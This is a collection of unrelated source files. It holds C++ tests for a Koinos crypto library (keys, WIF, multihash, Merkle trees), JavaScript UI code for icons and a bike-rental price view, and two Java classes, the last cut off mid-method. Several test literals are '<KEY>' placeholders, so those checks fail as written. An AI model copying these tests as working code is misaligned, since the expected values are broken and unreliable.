        private_key priv = private_key::regenerate( h );
        BOOST_CHECK( nullkey != priv );
        public_key pub = priv.get_public_key();
        pass += "1";
        multihash h2 = hash( multicodec::sha2_256, pass.c_str(), pass.size() );
        // NOTE(review): pub1/priv1 are computed but never asserted against —
        // possibly leftover from a larger test.
        public_key pub1 = pub.add( h2 );
        private_key priv1 = private_key::generate_from_seed(h, h2);
        auto sig = priv.sign_compact( h );
        auto recover = public_key::recover( sig, h );
        BOOST_CHECK( recover == pub );
    }
}
// WIF (wallet import format) round-trip and corruption detection.
// NOTE(review): several "<KEY>" literals are redacted placeholders from a
// dataset scrub — those sub-checks cannot pass as written and need the
// original WIF strings restored.
BOOST_AUTO_TEST_CASE( private_wif )
{
    std::string secret = "foobar";
    std::string wif = "<KEY>";
    private_key key1 = private_key::regenerate( hash( multicodec::sha2_256, secret.c_str(), secret.size() ) );
    BOOST_CHECK_EQUAL( key1.to_wif(), wif );
    private_key key2 = private_key::from_wif( wif );
    BOOST_CHECK( key1 == key2 );
    // Encoding:
    // Prefix Secret Checksum
    // 80 C3AB8FF13720E8AD9047DD39466B3C8974E592C2FA383D4A3960714CAEF0C4F2 C957BEB4
    // Wrong checksum, change last octal (4->3)
    wif = "5KJTiKfLEzvFuowRMJqDZnSExxxwspVni1G4RcggoPtDqP5XgLz";
    BOOST_REQUIRE_THROW( private_key::from_wif( wif ), key_serialization_error );
    // Wrong seed, change first octal of secret (C->D)
    wif = "<KEY>";
    BOOST_REQUIRE_THROW( private_key::from_wif( wif ), key_serialization_error );
    // Wrong prefix, change first octal of prefix (8->7)
    wif = "<KEY>";
    BOOST_REQUIRE_THROW( private_key::from_wif( wif ), key_serialization_error );
}
// Derives a public key from a WIF private key and checks its raw
// (version-byte-prefixed) address bytes against a fixed constant.
// NOTE(review): "<KEY>" is a redacted placeholder — the original WIF
// string is needed for this test to run.
BOOST_AUTO_TEST_CASE( public_address )
{
    std::string private_wif = "<KEY>";
    auto priv_key = private_key::from_wif( private_wif );
    auto pub_key = priv_key.get_public_key();
    auto address = pub_key.to_address_bytes();
    const unsigned char bytes[] = { 0x00, 0xf5, 0x4a, 0x58, 0x51, 0xe9, 0x37, 0x2b, 0x87, 0x81, 0x0a, 0x8e, 0x60,
                                    0xcd, 0xd2, 0xe7, 0xcf, 0xd8, 0x0b, 0x6e, 0x31, 0xc7, 0xf1, 0x8f, 0xe8 };
    std::string address_bytes( reinterpret_cast< const char* >( bytes ), sizeof( bytes ) );
    BOOST_REQUIRE_EQUAL( address, address_bytes );
}
// multihash::zero must carry the requested codec and a digest of the
// algorithm's full width (filled with zeros).
BOOST_AUTO_TEST_CASE( zerohash )
{
    multihash mh;
    mh = multihash::zero( multicodec::sha2_256 );
    BOOST_CHECK( mh.code() == multicodec::sha2_256 );
    BOOST_CHECK( mh.digest().size() == 256/8 );
    mh = multihash::zero( multicodec::ripemd_160 );
    BOOST_CHECK( mh.code() == multicodec::ripemd_160 );
    BOOST_CHECK( mh.digest().size() == 160/8 );
}
// multihash::empty must equal the hash of the empty input (this is the
// well-known SHA-256 digest of zero bytes).
BOOST_AUTO_TEST_CASE( emptyhash )
{
    multihash mh = multihash::empty( multicodec::sha2_256 );
    BOOST_CHECK_EQUAL( "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", hex_string( mh.digest() ) );
}
// Builds a 9-leaf Merkle tree by hand (pairwise SHA-256 of concatenated
// digests) and checks that merkle_tree produces the same root and leaf
// layout. NOTE(review): some "<KEY>" entries in wh_hex are redacted
// placeholders — those per-leaf digest checks need the original values.
BOOST_AUTO_TEST_CASE( merkle )
{
    std::vector< std::string > values
    {
        "the", "quick", "brown", "fox", "jumps", "over", "a", "lazy", "dog"
    };
    // Expected SHA-256 digest of each word above, in order.
    std::vector< std::string > wh_hex
    {
        "b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0",
        "22c72aa82ce77c82e2ca65a711c79eaa4b51c57f85f91489ceeacc7b385943ba",
        "<KEY>",
        "<KEY>",
        "<KEY>",
        "5fb6a47e368e12e5d8b19280796e6a3d146fe391ed2e967d5f95c55bfb0f9c2f",
        "ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb",
        "<KEY>",
        "<KEY>"
    };
    // Inner-node hash: SHA-256 over the concatenation of two child digests.
    auto h = [&]( const multihash& ha, const multihash& hb ) -> multihash
    {
        std::vector< std::byte > temp;
        std::copy( ha.digest().begin(), ha.digest().end(), std::back_inserter( temp ) );
        std::copy( hb.digest().begin(), hb.digest().end(), std::back_inserter( temp ) );
        multihash result = hash( multicodec::sha2_256, (char*)temp.data(), temp.size() );
        return result;
    };
    // Hash of each word
    std::vector< multihash > wh;
    for( size_t i = 0; i < values.size(); i++ )
    {
        wh.push_back( hash( multicodec::sha2_256, values[i].c_str(), values[i].size() ) );
        BOOST_CHECK_EQUAL( wh_hex[i], hex_string( wh[i].digest() ) );
    }
    // Expected hex digests for every inner node, bottom-up.
    const std::string n01 = "0020397085ab4494829e691c49353a04d3201fda20c6a8a6866cf0f84bb8ce47";
    const std::string n23 = "78d4e37706320c82b2dd092eeb04b1f271523f86f910bf680ff9afcb2f8a33e1";
    const std::string n0123 = "e07aa684d91ffcbb89952f5e99b6181f7ee7bd88bd97be1345fc508f1062c050";
    const std::string n45 = "4185f41c5d7980ae7d14ce248f50e2854826c383671cf1ee3825ea957315c627";
    const std::string n67 = "b2a6704395c45ad8c99247103b580f7e7a37f06c3d38075ce4b02bc34c6a6754";
    const std::string n4567 = "2f24a249901ee8392ba0bb3b90c8efd6e2fee6530f45769199ef82d0b091d8ba";
    const std::string n01234567 = "913b7dce068efc8db6fab0173481f137ce91352b341855a1719aaff926169987";
    const std::string n8 = "cd6357efdd966de8c0cb2f876cc89ec74ce35f0968e11743987084bd42fb8944";
    const std::string n012345678 = "e24e552e0b6cf8835af179a14a766fb58c23e4ee1f7c6317d57ce39cc578cfac";
    // Manual bottom-up construction of the tree.
    multihash h01 = h( wh[0], wh[1] );
    multihash h23 = h( wh[2], wh[3] );
    multihash h0123 = h( h01, h23 );
    multihash h45 = h( wh[4], wh[5] );
    multihash h67 = h( wh[6], wh[7] );
    multihash h4567 = h( h45, h67 );
    multihash h01234567 = h( h0123, h4567 );
    multihash h8 = wh[8];  // odd leaf is promoted unchanged
    multihash h012345678 = h( h01234567, h8 );
    BOOST_CHECK_EQUAL( n01 , hex_string( h01.digest() ) );
    BOOST_CHECK_EQUAL( n23 , hex_string( h23.digest() ) );
    BOOST_CHECK_EQUAL( n0123 , hex_string( h0123.digest() ) );
    BOOST_CHECK_EQUAL( n45 , hex_string( h45.digest() ) );
    BOOST_CHECK_EQUAL( n67 , hex_string( h67.digest() ) );
    BOOST_CHECK_EQUAL( n4567 , hex_string( h4567.digest() ) );
    BOOST_CHECK_EQUAL( n01234567 , hex_string( h01234567.digest() ) );
    BOOST_CHECK_EQUAL( n012345678, hex_string( h012345678.digest() ) );
    // merkle_tree must reproduce the same root and preserve leaf order.
    auto tree = merkle_tree( multicodec::sha2_256, values );
    BOOST_CHECK_EQUAL( n012345678, hex_string( tree.root()->hash().digest() ) );
    BOOST_CHECK_EQUAL( *tree.root()->left()->left()->left()->left()->value() , values[0] ); // the
    BOOST_CHECK_EQUAL( *tree.root()->left()->left()->left()->right()->value() , values[1] ); // quick
    BOOST_CHECK_EQUAL( *tree.root()->left()->left()->right()->left()->value() , values[2] ); // brown
    BOOST_CHECK_EQUAL( *tree.root()->left()->left()->right()->right()->value() , values[3] ); // fox
    BOOST_CHECK_EQUAL( *tree.root()->left()->right()->left()->left()->value() , values[4] ); // jumps
    BOOST_CHECK_EQUAL( *tree.root()->left()->right()->left()->right()->value() , values[5] ); // over
    BOOST_CHECK_EQUAL( *tree.root()->left()->right()->right()->left()->value() , values[6] ); // a
    BOOST_CHECK_EQUAL( *tree.root()->left()->right()->right()->right()->value(), values[7] ); // lazy
    BOOST_CHECK_EQUAL( *tree.root()->right()->value() , values[8] ); // dog
    // A tree built from pre-hashed leaves must match the string-leaf tree.
    std::vector< multihash > v( values.size() );
    std::transform(
        std::begin( values ),
        std::end( values ),
        std::begin( v ),
        [] ( const std::string& s ) { return hash( multicodec::sha2_256, s ); }
    );
    auto multihash_tree = merkle_tree( multicodec::sha2_256, v );
    BOOST_CHECK_EQUAL( multihash_tree.root()->hash(), tree.root()->hash() );
    // An empty tree's root is the empty hash, not the zero hash.
    auto mtree = merkle_tree( multicodec::sha2_256, std::vector< std::string >() );
    BOOST_CHECK( mtree.root()->hash() == multihash::empty( multicodec::sha2_256 ) );
    BOOST_CHECK( mtree.root()->hash() != multihash::zero( multicodec::sha2_256 ) );
}
// Hashing a protobuf message must equal hashing its serialized bytes, and
// multihashes stored in string fields must round-trip via the converter.
BOOST_AUTO_TEST_CASE( protocol_buffers_test )
{
    std::string id_str = "id";
    std::string previous_str = "previous";
    koinos::block_topology block_topology;
    block_topology.set_height( 100 );
    block_topology.set_id( koinos::util::converter::as< std::string>( hash( multicodec::sha1, id_str ) ) );
    block_topology.set_previous( koinos::util::converter::as< std::string>( hash( multicodec::sha2_512, previous_str ) ) );
    auto mhash = hash( multicodec::sha2_256, block_topology );
    // Serialize manually and hash the raw bytes for comparison.
    std::stringstream stream;
    block_topology.SerializeToOstream( &stream );
    std::string str = stream.str();
    std::vector< std::byte > bytes( str.size() );
    std::transform( str.begin(), str.end(), bytes.begin(), []( char c ) { return std::byte( c ); } );
    BOOST_CHECK( hash( multicodec::sha2_256, bytes ) == mhash );
    // Multihash fields round-trip through the string converter.
    auto id_hash = koinos::util::converter::to< multihash >( block_topology.id() );
    BOOST_CHECK( id_hash == hash( multicodec::sha1, id_str ) );
    auto previous_hash = koinos::util::converter::to< multihash >( block_topology.previous() );
    BOOST_CHECK( previous_hash == hash( multicodec::sha2_512, previous_str ) );
    // Hashing via pointer overload must match hashing by reference.
    auto mhash2 = hash( multicodec::sha2_256, &block_topology );
    BOOST_CHECK( mhash == mhash2 );
}
// multihash must round-trip through binary serialization, stream-format as
// a 0x-prefixed hex string, and interpolate into exception messages.
BOOST_AUTO_TEST_CASE( multihash_serialization )
{
    auto mhash = hash( multicodec::ripemd_160, std::string( "a quick brown fox jumps over the lazy dog" ) );
    std::stringstream stream;
    koinos::to_binary( stream, mhash );
    multihash tmp;
    koinos::from_binary( stream, tmp );
    BOOST_CHECK( mhash == tmp );
    std::stringstream ss;
    ss << mhash;
    BOOST_CHECK( ss.str() == "0xd3201409c999f213afff19793d8288023c512f71873deb" );
    try {
        KOINOS_THROW( koinos::exception, "test multihash in exception: ${mh}", ("mh", mhash ) );
        BOOST_REQUIRE( false );  // the throw above must not be skipped
    }
    catch( const koinos::exception& e )
    {
        BOOST_REQUIRE( e.what() == std::string( "test multihash in exception: 0xd3201409c999f213afff19793d8288023c512f71873deb" ) );
    }
}
// The variadic hash overload must concatenate its arguments' serialized
// forms exactly like manual stream serialization does.
BOOST_AUTO_TEST_CASE( variadic_hash )
{
    std::string id_str = "id";
    std::string previous_str = "previous";
    koinos::block_topology block_topology;
    block_topology.set_height( 100 );
    block_topology.set_id( koinos::util::converter::as< std::string>( hash( multicodec::sha1, id_str ) ) );
    block_topology.set_previous( koinos::util::converter::as< std::string>( hash( multicodec::sha2_512, previous_str ) ) );
    // Build the reference byte stream by hand: message + string + uint256.
    std::stringstream ss;
    block_topology.SerializeToOstream( &ss );
    ss << "a quick brown fox jumps over the lazy dog";
    koinos::uint256_t x = 0;
    koinos::to_binary( ss, x );
    auto mhash1 = hash( multicodec::ripemd_160, ss.str() );
    auto mhash2 = hash( multicodec::ripemd_160, block_topology, std::string( "a quick brown fox jumps over the lazy dog" ), x );
    BOOST_REQUIRE( mhash1 == mhash2 );
}
BOOST_AUTO_TEST_SUITE_END()
|
<filename>src/components/SVG/index.js<gh_stars>0
import styled, { css } from 'styled-components'
import _JamLogo from './JamLogo.svg'
import _Instagram from './Instagram.svg'
import _Medium from './Medium.svg'
import _Twitter from './Twitter.svg'
// Public re-exports of the raw SVG components under their display names.
export const JamLogo = _JamLogo
export const Instagram = _Instagram
export const Medium = _Medium
export const Twitter = _Twitter

// Shared styling for the small icon variants: fixed 20px width, and a fill
// taken from the theme colour named by the `colour` prop, falling back to
// the theme's white when the prop is missing or names an unknown colour.
const small = css`
width: 20px;
height: auto;
fill: ${props => ( props.colour && props.theme.colours[ props.colour ] ) || props.theme.colours.white};
`

// 20px-wide variants of each social icon.
export const SmallMedium = styled(Medium)`
${small}
`
export const SmallTwitter = styled(Twitter)`
${small}
`
export const SmallInstagram = styled(Instagram)`
${small}
`
|
import { getData } from "../utils/FetchData";
// Cached DOM references for the prices view.
// querySelector already returns null when nothing matches and
// querySelectorAll always returns a NodeList (possibly empty, but never
// falsy), so the previous `|| null` defaulting was redundant/dead.
const $sectionPrices = document.querySelector("#ViewPrices");
const $selectPrices = document.querySelector("#category_id");
const $card = document.querySelector("#card-info");
const $spanPrince = document.querySelector("#spanPrince");
const $spanAvailable = document.querySelector("#spanAvailable");
const $selectSku = document.querySelector("#sku_id");
const $tdColor = document.querySelector("#tdColor");
const $tdFreno = document.querySelector("#tdFreno");
const $tdRin = document.querySelector("#tdRin");
const $tdVelocidad = document.querySelector("#tdVelocidad");
const $containerImage = document.querySelector("#containerImage");
const $noteAvailable = document.querySelector("#noteAvailable");
const $btnRental = document.querySelector("#btnRental");
const $time = document.querySelectorAll(".TimeHour");
/**
 * Build the 24 hour <option> elements ("00 : 00" … "23 : 00") for a time
 * select.
 * @param {string|number} min - minimum hour read from data-min; currently
 *   unused (the disable-before-min logic was never enabled), kept so the
 *   call signature stays stable for callers.
 * @returns {HTMLOptionElement[]} one option per hour of the day.
 */
const createOption = (min) => {
  const HOURS = 24;
  const options = [];
  for (let hour = 0; hour < HOURS; hour++) {
    const option = document.createElement("option");
    option.value = hour;
    // Zero-pad single-digit hours: "09 : 00" rather than "9 : 00".
    option.textContent = `${String(hour).padStart(2, "0")} : 00`;
    options.push(option);
  }
  return options;
};
// Fill every ".TimeHour" select with the 24 hour options.
const formTime = () => {
  Array.from($time).forEach((select) => {
    select.append(...createOption(select.dataset.min));
  });
};
/**
 * Fetch a single price record by id.
 * @param {number} idPrice
 * @returns {Promise<Object|undefined>} the price payload, or undefined when
 *   the request fails or returns a non-200 status.
 */
const getPrice = async (idPrice) => {
  const url = `admin/precios/${idPrice}`;
  try {
    const response = await getData(url);
    if (response.ok === true && response.status === 200) {
      return response.data.data;
    }
  } catch (error) {
    // Best-effort: log and fall through so callers receive undefined.
    // (A stray `debugger;` statement was removed here.)
    console.log(error);
  }
};
// Fetch the available-stock count for a SKU; resolves to undefined when the
// request fails or the server answers with a non-200 status.
const availableBikes = async (id) => {
  try {
    const response = await getData(`admin/skusAvailable/${id}`);
    const succeeded = response.ok === true && response.status === 200;
    if (succeeded) {
      return response.data.data;
    }
  } catch (error) {
    console.log(error);
  }
};
// Fetch every SKU/reference belonging to a category; resolves to undefined
// when the request fails or the server answers with a non-200 status.
const getSkus = async (idCategory) => {
  try {
    const response = await getData(`admin/skusCategory/${idCategory}`);
    if (response.ok !== true || response.status !== 200) {
      return;
    }
    return response.data.data;
  } catch (error) {
    console.log(error);
  }
};
// Fetch the attribute list for a SKU; resolves to undefined when the request
// fails or the server answers with a non-200 status.
const getAttributes = async (idSku) => {
  const endpoint = `admin/attributes/${idSku}`;
  try {
    const response = await getData(endpoint);
    const succeeded = response.ok === true && response.status === 200;
    return succeeded ? response.data.data : undefined;
  } catch (error) {
    console.log(error);
  }
};
/**
 * Refresh the detail card for the selected SKU/reference: the attribute
 * table, the product image, the availability count and the rental button.
 * @param {number} idReference - id of the selected SKU.
 */
const handleChangeReference = async (idReference) => {
  // Guard: getAttributes resolves to undefined on fetch failure; treat that
  // as "no attributes" instead of throwing on .forEach below.
  const attributes = (await getAttributes(parseInt(idReference))) || [];
  // Reset the attribute cells before repopulating.
  $tdColor.textContent = "";
  $tdFreno.textContent = "";
  $tdRin.textContent = "";
  $tdVelocidad.textContent = "";
  // forEach (not map): we only perform side effects per attribute.
  attributes.forEach((attribute) => {
    switch (attribute.attribute.toLowerCase()) {
      case "color":
        $tdColor.textContent = attribute.value;
        break;
      case "brake":
        $tdFreno.textContent = attribute.value;
        break;
      case "rin":
        $tdRin.textContent = attribute.value;
        break;
      case "speed":
        $tdVelocidad.textContent = attribute.value + " KM/H";
        break;
    }
  });
  // Replace the product image (all attributes share the same SKU image).
  $containerImage.innerHTML = "";
  if (attributes.length > 0) {
    const img = document.createElement("img");
    img.classList.add("img-fluid");
    img.src = window.location.origin + "/images/upload/" + attributes[0].sku.image;
    $containerImage.append(img);
  }
  // Availability drives the rental button and the warning note.
  const available = await availableBikes(idReference);
  $spanAvailable.textContent = available;
  $noteAvailable.textContent = "";
  $btnRental.disabled = false;
  if (available <= 0) {
    $noteAvailable.textContent =
      "No puedes alquilar porque no hay stock de está referencia.";
    $btnRental.disabled = true;
  }
};
/**
 * Handle selection of a price/category: update the card header, rebuild the
 * SKU select, wire its change handler, and show the formatted price.
 * @param {number} idPrice - id of the selected price/category.
 */
const handleChange = async (idPrice) => {
  const price = await getPrice(idPrice);
  $card.querySelector(".card-header").textContent =
    "Bicicleta - " + price.category.name;
  const references = await getSkus(price.category.id);
  $selectSku.innerHTML = "";
  // map now genuinely maps reference -> option (the old code used map for
  // side effects and discarded its result).
  const options = references.map((reference) => {
    const option = document.createElement("option");
    option.value = reference.id;
    option.textContent = `${reference.id} - ${reference.name}`;
    return option;
  });
  $selectSku.append(...options);
  handleChangeReference(parseInt($selectSku.value));
  // Property assignment (not addEventListener): handleChange runs on every
  // category change, and addEventListener was stacking a duplicate listener
  // each time, firing handleChangeReference once per past selection.
  $selectSku.onchange = (e) => {
    e.preventDefault();
    handleChangeReference(parseInt(e.target.value));
  };
  $spanPrince.textContent = formatPrice(price.price);
};
// Wire the category <select>'s change event to handleChange, if the element
// exists on this page.
const changeSelect = () => {
  if (!$selectPrices) {
    return;
  }
  $selectPrices.addEventListener("change", (e) => {
    e.preventDefault();
    handleChange(parseInt(e.target.value));
  });
};
// Format a numeric price as USD currency text (e.g. "$1,234.00").
const formatPrice = (price) =>
  new window.Intl.NumberFormat("en-EN", {
    style: "currency",
    currency: "USD",
  }).format(price);
// Entry point: initialise the prices view once the DOM is ready. Does
// nothing on pages without the #ViewPrices section.
const initViewPrices = () => {
  window.addEventListener("DOMContentLoaded", async () => {
    if (!$sectionPrices) {
      return;
    }
    changeSelect();
    await handleChange(parseInt($selectPrices.value));
    formTime();
  });
};
export { initViewPrices };
|
package indi.nut.myspring.web.servlet.handler;
import indi.nut.myspring.ioc.beans.factory.InitializingBean;
import indi.nut.myspring.web.method.HandlerMethod;
import javax.servlet.http.HttpServletRequest;
import java.lang.invoke.MethodHandle;
import java.lang.reflect.Method;
import java.util.*;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.locks.ReentrantReadWriteLock;
/**
 * Abstract base class for HandlerMapping implementations that map web
 * requests to {@link HandlerMethod}s. Handler methods are detected during
 * bean initialization via {@link #afterPropertiesSet()}.
 *
 * Created by nut on 2016/12/29.
 */
public abstract class AbstractHandlerMethodMapping<T> extends AbstractHandlerMapping implements InitializingBean {

    @Override
    protected Object getHandlerInternal(HttpServletRequest request) {
        // Not implemented yet: lookup of the HandlerMethod for a request.
        return null;
    }

    @Override
    public void afterPropertiesSet() throws Exception {
        initHandlerMethods();
    }

    /** Detects handler methods at initialization time; placeholder for subclasses. */
    protected void initHandlerMethods() {
    }

    /**
     * Registry that maintains all mappings to handler methods, plus a
     * direct-URL index and a name index.
     *
     * Mutation and direct-URL lookup are guarded by {@code readWriteLock}:
     * {@code mappingLookup} is a plain LinkedHashMap and the url lists are
     * mutated in place, so registration must be exclusive. (The lock field
     * previously existed but was never acquired, leaving registration racy.)
     */
    class MappingRegistry {

        private final Map<T, HandlerMethod> mappingLookup = new LinkedHashMap<>();

        private final Map<String, List<T>> urlLookup = new ConcurrentHashMap<>();

        private final Map<String, List<HandlerMethod>> nameLookup = new ConcurrentHashMap<>();

        private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock();

        public List<HandlerMethod> getHandlerMethodsByMappingName(String mappingName) {
            // ConcurrentHashMap read; no lock needed for the name index.
            return this.nameLookup.get(mappingName);
        }

        public List<T> getMappingsByUrl(String urlPath) {
            // Read lock: the returned list is mutated in place by register().
            this.readWriteLock.readLock().lock();
            try {
                return this.urlLookup.get(urlPath);
            } finally {
                this.readWriteLock.readLock().unlock();
            }
        }

        public void register(T mapping, Object handler, Method method) throws Exception {
            this.readWriteLock.writeLock().lock();
            try {
                HandlerMethod handlerMethod = createHandlerMethod(handler, method);
                this.mappingLookup.put(mapping, handlerMethod);
                for (String url : getDirectUrls(mapping)) {
                    List<T> mappings = this.urlLookup.getOrDefault(url, new ArrayList<T>());
                    mappings.add(mapping);
                    this.urlLookup.put(url, mappings);
                }
            } finally {
                this.readWriteLock.writeLock().unlock();
            }
        }
    }

    /**
     * Collect the URL patterns of the given mapping that contain no
     * path-matching wildcards, i.e. those usable for direct map lookup.
     */
    protected List<String> getDirectUrls(T mapping) {
        List<String> urls = new ArrayList<>(1);
        //TODO pattern
        for (String url : getMappingPathPatterns(mapping)) {
            if (!getPathMatcher().isPattern(url)) {
                urls.add(url);
            }
        }
        return urls;
    }

    /** @return all URL path patterns declared by the given mapping */
    protected abstract Set<String> getMappingPathPatterns(T mapping);

    /**
     * Create a HandlerMethod for the handler/method pair. A String handler is
     * treated as a bean name to be resolved lazily through the bean factory.
     */
    protected HandlerMethod createHandlerMethod(Object handler, Method method) throws Exception {
        HandlerMethod handlerMethod;
        if (handler instanceof String) {
            String beanName = (String) handler;
            handlerMethod = new HandlerMethod(beanName, getApplicationContext().getAutoWireCapableBeanFactory(), method);
        } else {
            handlerMethod = new HandlerMethod(handler, method);
        }
        return handlerMethod;
    }
}
|
package kbasesearchengine.parse;
import java.io.IOException;
import java.util.ArrayList;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;
import com.fasterxml.jackson.core.JsonParser;
import com.fasterxml.jackson.core.JsonToken;
import kbasesearchengine.common.JsonTokenUtil;
import kbasesearchengine.common.ObjectJsonPath;
/**
 * Extraction of searchable subset based on JSON token stream.
 * The extractor walks a Jackson token stream and copies to the consumer only
 * the parts selected by a tree of {@link SubObjectExtractionNode} paths,
 * without materializing the whole document in memory.
 * @author rsutormin
 */
public class SubObjectExtractor {

    /**
     * Extract the fields listed in selection from the element and add them to the subset.
     *
     * selection must either be an object containing structure field names to extract, '*' in the case of
     * extracting a mapping, or '[*]' for extracting a list. if the selection is empty, nothing is added.
     * If extractKeysOf is set, and the element is an Object (ie a kidl mapping), then an array of the keys
     * is added instead of the entire mapping.
     *
     * we assume here that selection has already been validated against the structure of the document, so that
     * if we get true on extractKeysOf, it really is a mapping, and if we get a '*' or '[*]', it really is
     * a mapping or array.
     * @throws ObjectParseException
     */
    public static void extract(
            final ObjectJsonPath pathToSub,
            final List<ObjectJsonPath> objpaths,
            final JsonParser jts,
            final SubObjectConsumer consumer)
            throws IOException, ObjectParseException {
        //if the selection is empty, we return without adding anything
        // Build the selection tree: pathToSub marks the sub-object root, and
        // each objpath marks a subtree whose tokens must be copied out.
        SubObjectExtractionNode root = new SubObjectExtractionNode();
        SubObjectExtractionNode sub = root.addPath(pathToSub, true, false);
        for (ObjectJsonPath path: objpaths) {
            sub.addPath(JsonTokenUtil.trimPath(path), false, true);
        }
        extract(root, jts, consumer);
    }

    /**
     * Drive the extraction over the token stream using a prebuilt selection
     * tree, then flush the consumer.
     * @throws ObjectParseException
     */
    public static void extract(
            final SubObjectExtractionNode tree,
            final JsonParser jts,
            final SubObjectConsumer consumer)
            throws IOException, ObjectParseException {
        JsonToken t = jts.nextToken();
        extractFieldsWithOpenToken(jts, t, tree, consumer, new ArrayList<String>(),
                false, false, true);
        consumer.flush();
    }

    /*
     * This is main recursive method for tracking current token place in subset schema tree
     * and making decisions whether or not we need to process this token or block of tokens or
     * just skip it.
     *
     * path is the current location in the document and is mutated in place
     * (push on descent, pop on return). strictMaps/strictArrays make a
     * selected-but-absent key/index an error. fromSkippedLevel is true when
     * the parent level was not itself written to the output.
     */
    private static void extractFieldsWithOpenToken(
            final JsonParser jts,
            final JsonToken current,
            final SubObjectExtractionNode selection,
            final SubObjectConsumer consumer,
            final List<String> path,
            final boolean strictMaps,
            final boolean strictArrays,
            final boolean fromSkippedLevel)
            throws IOException, ObjectParseException {
        if (fromSkippedLevel && !selection.isSkipLevel()) {
            // It means we're starting sub-object (or whole object is needed)
            consumer.nextObject(ObjectJsonPath.getPathText(path));
        }
        JsonToken t = current;
        boolean skipLvl = selection.isSkipLevel();
        if (t == JsonToken.START_OBJECT) { // we observe open of mapping/object in real json data
            if (selection.hasChildren()) { // we have some restrictions for this object in selection
                // we will remove visited keys from selectedFields and check emptiness at object end
                Set<String> selectedFields = new LinkedHashSet<String>(
                        selection.getChildren().keySet());
                if (selectedFields.size() == 1 && selectedFields.contains("{size}")) {
                    // special selection: only the number of keys is wanted
                    int size = 0;
                    while (true) {
                        t = jts.nextToken();
                        if (t == JsonToken.END_OBJECT) {
                            break;
                        }
                        if (t != JsonToken.FIELD_NAME)
                            throw new ObjectParseException("Error parsing json format " +
                                    t.asString() + ", at: " + ObjectJsonPath.getPathText(path));
                        t = jts.nextToken();
                        JsonTokenUtil.skipChildren(jts, t);
                        size++;
                    }
                    consumer.getOutput().writeNumber(size);
                } else {
                    boolean all = false;
                    SubObjectExtractionNode allChild = null;
                    if (selectedFields.contains("*")) {
                        all = true;
                        selectedFields.remove("*");
                        allChild = selection.getChildren().get("*");
                        // '*' must be the only selection at this level
                        if (selectedFields.size() > 0)
                            throw new ObjectParseException("Invalid selection: the selection path " +
                                    "contains both '*' to select all fields and selection of " +
                                    "specific fields (" + selectedFields + "), at: " +
                                    ObjectJsonPath.getPathText(path));
                    }
                    // process first token standing for start of object
                    if (!skipLvl) {
                        JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
                    }
                    while (true) {
                        t = jts.nextToken();
                        if (t == JsonToken.END_OBJECT) {
                            if (!skipLvl) {
                                JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
                            }
                            break;
                        }
                        if (t != JsonToken.FIELD_NAME)
                            throw new ObjectParseException("Error parsing json format " +
                                    t.asString() + ", at: " + ObjectJsonPath.getPathText(path));
                        String fieldName = jts.getText();
                        if (all || selectedFields.contains(fieldName)) {
                            // if we need all fields or the field is present in list of necessary fields
                            // we process it and value following after that
                            if (!all)
                                selectedFields.remove(fieldName);
                            if (!skipLvl) {
                                JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
                            }
                            // read first token of value block in order to prepare state for recursive
                            // extractFieldsWithOpenToken call
                            t = jts.nextToken();
                            // add field to the tail of path branch
                            path.add(fieldName);
                            // process value corresponding to this field recursively
                            extractFieldsWithOpenToken(jts, t, all ? allChild :
                                    selection.getChildren().get(fieldName), consumer, path,
                                    strictMaps, strictArrays, selection.isSkipLevel());
                            // remove field from tail of path branch
                            path.remove(path.size() - 1);
                        } else {
                            // otherwise we skip value following after field
                            t = jts.nextToken();
                            JsonTokenUtil.skipChildren(jts, t);
                        }
                    }
                    // let's check have we visited all selected fields in this map
                    // we will not visit them in real data and hence will not delete them from selection
                    if (strictMaps && !selectedFields.isEmpty()) {
                        String notFound = selectedFields.iterator().next();
                        throw new ObjectParseException("Invalid selection: data does not contain " +
                                "a field or key named '" + notFound + "', at: " +
                                getPathText(path, notFound));
                    }
                }
            } else { // need all fields and values
                if (selection.isNeedAll()) {
                    JsonTokenUtil.writeTokensFromCurrent(jts, t, consumer.getOutput());
                } else {
                    JsonTokenUtil.skipChildren(jts, t);
                }
            }
        } else if (t == JsonToken.START_ARRAY) { // we observe open of array/list in real json data
            if (selection.hasChildren()) { // we have some restrictions for array item positions in selection
                Set<String> selectedFields = new LinkedHashSet<String>(
                        selection.getChildren().keySet());
                if (selectedFields.size() == 1 && selectedFields.contains("{size}")) {
                    // special selection: only the array length is wanted
                    int size = 0;
                    while (true) {
                        t = jts.nextToken();
                        if (t == JsonToken.END_ARRAY) {
                            break;
                        }
                        JsonTokenUtil.skipChildren(jts, t);
                        size++;
                    }
                    consumer.getOutput().writeNumber(size);
                } else {
                    SubObjectExtractionNode allChild = null;
                    // now we support only '[*]' which means all elements and set of numbers in case of
                    // certain item positions are selected in array
                    if (!selectedFields.contains("[*]")) {
                        for (String item : selectedFields) {
                            try {
                                Integer.parseInt(item);
                            } catch (NumberFormatException ex) {
                                throw new ObjectParseException("Invalid selection: data at '" +
                                        ObjectJsonPath.getPathText(path) + "' is an array, so " +
                                        "element selection must be an integer. You requested element" +
                                        " '" + item + "', at: " + ObjectJsonPath.getPathText(path));
                            }
                        }
                    }
                    if (selectedFields.contains("[*]")) {
                        selectedFields.remove("[*]");
                        allChild = selection.getChildren().get("[*]");
                        // if there is [*] keyword selected there shouldn't be anything else in selection
                        if (selectedFields.size() > 0)
                            throw new ObjectParseException("Invalid selection: the selection path " +
                                    "contains both '[*]' to select all elements and selection of " +
                                    "specific elements (" + selectedFields + "), at: " +
                                    ObjectJsonPath.getPathText(path));
                    }
                    if (!skipLvl) {
                        JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput()); // write start of array into output
                    }
                    for (int pos = 0; ; pos++) {
                        t = jts.nextToken();
                        if (t == JsonToken.END_ARRAY) {
                            if (!skipLvl) {
                                JsonTokenUtil.writeCurrentToken(jts, t, consumer.getOutput());
                            }
                            break;
                        }
                        SubObjectExtractionNode child = null;
                        if (allChild != null) {
